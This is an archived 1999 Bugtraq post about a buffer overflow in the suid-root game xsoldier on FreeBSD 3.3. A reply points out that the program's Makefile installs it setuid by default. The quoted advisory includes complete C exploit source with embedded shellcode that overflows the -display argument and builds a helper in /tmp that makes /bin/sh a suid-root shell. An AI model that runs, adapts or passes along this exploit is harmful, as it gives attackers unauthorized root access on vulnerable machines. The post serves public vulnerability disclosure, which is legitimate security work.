Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Xsoldier xploit (was: FreeBSD 3.3 xsoldier root exploit)

From: beaupran () IRO UMONTREAL CA (Spidey)
Date: Wed, 15 Dec 1999 23:11:01 -0500

Just to make things clear. This is not particular to FreeBSD. This is
the xsoldier program compiled normally. In fact, in the distribution
of xsoldier, the Makefile precisely specifies that the program should
be installed suid:

install.bin::
        @if [ -d $(BINDIR) ]; then set +x;         else (set -x; $(MKDIRHIER) $(
BINDIR)); fi

        $(INSTALL) -c -m 4755 $(PROGRAM) $(BINDIR)/$(PROGRAM)
        @echo "install bin . done"

That is all...

--- Big Brother told Brock Tellier to write, at 17:11 of December 15:

Greetings,

OVERVIEW
A vulnerability in FreeBSD 3.3's xsoldier will allow any user to gain root
access.  This user does not have to have a valid $DISPLAY to exploit this.

BACKGROUND
Only FreeBSD 3.3-RELEASE has been tested.  xsoldier, suid-root by default, was
installed as part of the X11 games packages via /stand/sysinstall.

DETAILS
More problems with FreeBSD 3.3 ports.  This time with xsoldier, a suid-root
game.  A simple overflow in the -display option allows any user to gain root.
Although xsoldier only runs under X, a long -display arg on the CL will allow
us to gain root.

--- xsoldierx.c ---
/*
 * xsoldier exploit for Freebsd-3.3-RELEASE
 * Drops a suid root shell in /bin/sh
 * Brock Tellier btellier () usa net
 */


#include <stdio.h>

char shell[]= /* mudge () l0pht com */
  "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
   "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
   "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
   "\x9a>:)(:<\xe8\xc6\xff\xff\xff/tmp/ui";

#define CODE "void main() { chmod (\"/bin/sh\", 0004555);}\n"

void buildui() {
FILE *fp;
  char cc[100];
  fp = fopen("/tmp/ui.c", "w");
  fprintf(fp, CODE);
  fclose(fp);
  snprintf(cc, sizeof(cc), "cc -o /tmp/ui /tmp/ui.c");
  system(cc);
}

main (int argc, char *argv[] ) {
 int x = 0;
 int y = 0;
 int offset = 0;
 int bsize = 4400;
 char buf[bsize];
 int eip = 0xbfbfdb65; /* works for me */
 buildui();

 if (argv[1]) {
   offset = atoi(argv[1]);
   eip = eip + offset;
 }
 fprintf(stderr, "xsoldier exploit for FreeBSD 3.3-RELEASE
<btellier () usa net>\n");
 fprintf(stderr, "Drops you a suid-root shell in /bin/sh\n");
 fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);

 for ( x = 0; x < 4325; x++) buf[x] = 0x90;
     fprintf(stderr, "NOPs to %d\n", x);

 for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
     fprintf(stderr, "Shellcode to %d\n",x);

  buf[x++] =  eip & 0x000000ff;
  buf[x++] = (eip & 0x0000ff00) >> 8;
  buf[x++] = (eip & 0x00ff0000) >> 16;
  buf[x++] = (eip & 0xff000000) >> 24;
     fprintf(stderr, "eip to %d\n",x);

 buf[bsize]='\0';

execl("/usr/X11R6/bin/xsoldier", "xsoldier", "-display", buf, NULL);

}

-------

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier () usa net

____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1


--
Si l'image donne l'illusion de savoir
C'est que l'adage pretend que pour croire,
L'important ne serait que de voir

Lofofora
Previous By Date Next
Previous By Thread Next

Current thread: